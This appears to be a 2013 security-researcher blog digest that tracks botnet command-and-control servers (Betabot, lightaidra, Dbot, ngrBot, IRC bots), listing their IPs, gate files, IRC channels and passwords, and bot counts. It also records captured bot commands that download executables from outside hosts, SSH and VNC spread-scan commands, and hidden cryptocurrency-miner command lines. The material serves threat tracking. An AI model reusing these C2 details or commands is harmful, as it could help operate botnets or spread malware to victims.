Month: May 2013

guard4you.info (Betabot http botnet hosted by ecatel.net)

Resolved guard4you.info to 80.82.66.26
Server: guard4you.info
Gate file: /customer/order.php
Alternate domains: nexusguardian.info vote4us.info meet2n8.info

This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided to try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably all...

31.31.77.195 (lightaidra Router Botnet hosted in Czech Republic Hluboka Nad Vltavou Wedos Internet A.s.)

This bot infects routers. Credits to x00.

31.31.77.195:5060
Current Local Users: 2528 Max: 2534
Current Global Users: 2528 Max: 2534
Now talking in #sc4n
Topic: .sc4n->random->b root admin
Topic: Set by [infected (unknown address)] at (Mon May 06 02:31:20 2013)
#sc4n x00 @Albert-Wesker @infected

400 linux bots

http://ircqk.nixhosting.org/conf/mel

x00@x00 /tmp $ file mel
...

irc.antisecbrteam.tk (Dbot hosted in Brazil Sao Paulo Royalfit Comercio De Artigos Esportivos Ltda)

Resolved : [irc.antisecbrteam.tk] To [201.54.16.10]
Server: 201.54.16.10:6667
Server Password:
Username: zbotmhz
Nickname: L2-3891
Channel: #SpkB2 (Password: SpkDbot762)
Channeltopic:
Now talking in #SpkB2
Topic On: [ #SpkB2 ] [ .scan 75 1 177.x.x.x 2 1 177.x.x.x ]
Topic By: [ xHide ]

around 110 Dbots used for vnc brute and spread

JOIN #SpkB0 SpkBot762
Now talking ...

e.balkrev.com (ngrBot hosted in China Changsha Chinanet Hunan Province Network)

Resolved : [e.balkrev.com] To [124.232.150.214]
Resolved : [e.balkrev.com] To [60.172.229.40]
Resolved : [e.balkrev.com] To [124.232.163.154]
Resolved : [e.balkrev.com] To [124.232.163.150]
Resolved : [e.balkrev.com] To [124.232.163.119]

TCP Traffic: e.balkrev.com:6510
PASS smart

Data received:
:Fax!Max@hub.us.com ppppmsg
n[US{XPa{jikgbsd!jikgbsd@64.31.35.159 JOIN :#dpi
[US{XPa{jikgbsd3a2f #dpi :!dl hxxp://146.185.246.160/dqw7.exe !dl hxxp://146.185.246.160/ups.exe !dl hxxp://146.185.246.160/43n.exe !mdns hxxp://salsayvariando.com/av.txt
n[US{XPa{jikgbsd!jikgbsd@64.31. JOIN :#mss
n[US{XPa{jikgbsd @ #mss

so channels ...

were.hacked.jp (irc botnet hosted in France Roubaix Ovh Systems)

Thanks to anonymous guy in this post for the sample.

Resolved : [were.hacked.jp] To [176.31.123.56]
Server: 176.31.123.56:8782
Server Password:
Username: __x00
Nickname: {x00-00-DEU-XP-DELL-9640}
Channel: ###x00### (Password: )
Channeltopic: :.ban |.scan sshspreadscan 120 7 0 41.x.x.x

sample here

hosting infos: http://whois.domaintools.com/176.31.123.56

208.89.209.54 (Irc botnet hosted by virpus.com)

Server: 208.89.209.54
Port: 6667
Current global users 77, max 695

Channels:
#goon 3
#aryan 39 #OFFLINE
#flood 1
##yBz## 15
##Offline## 19

Aryan bots:
Channel: #aryan
Topic for #aryan is: #OFFLINE
Topic for #aryan set by formality at Sun May 05 16:23:03 2013

Linux bots:
Channel: ##Offline##
Channel: ##yBz##

Hosting infos: http://whois.domaintools.com/208.89.209.54

betabros.in (Several http botnets hosted by hostkey.ru)

Resolved betabros.in to 146.0.78.4
Server: betabros.in
Gate file: /beta/order.php

The owner should keep a closer eye on the fake forum he set up for cover. 1071 pages of pharmacy spam and counting.

Hosting infos: http://whois.domaintools.com/146.0.78.4

EDIT: Bitcoin and litecoin mining.
macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x
shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p x
...

jkdef8.ws (Betabot http botnet hosted by ecatel.net)

Resolved jkdef8.ws to 94.102.51.117
Server: jkdef8.ws
Gate file: /papka/order.php
Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws

Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x

Hosting infos: http://whois.domaintools.com/94.102.51.117

msn.3utilities.com (Betabot http botnet hosted by ecatel.net)

Resolved msn.3utilities.com to 80.82.66.43
Server: msn.3utilities.com
Port: 81
Gate file: /help/order.php
Alternate domains: videoparadise.biz kittybook.biz msn1981.3utilities.com dates4you.tk

Three out of the five domains are free and easy to get suspended. Pro botherder here.

Bitcoin mining info: stratum+tcp://eu-stratum.btcguild.com:3333 -u m4tr1x_neo -p 123 -t 0 -I -3
Litecoin mining info: -a scrypt -o http://kittybook.no-ip.biz:8332 -u m4tr1x_0...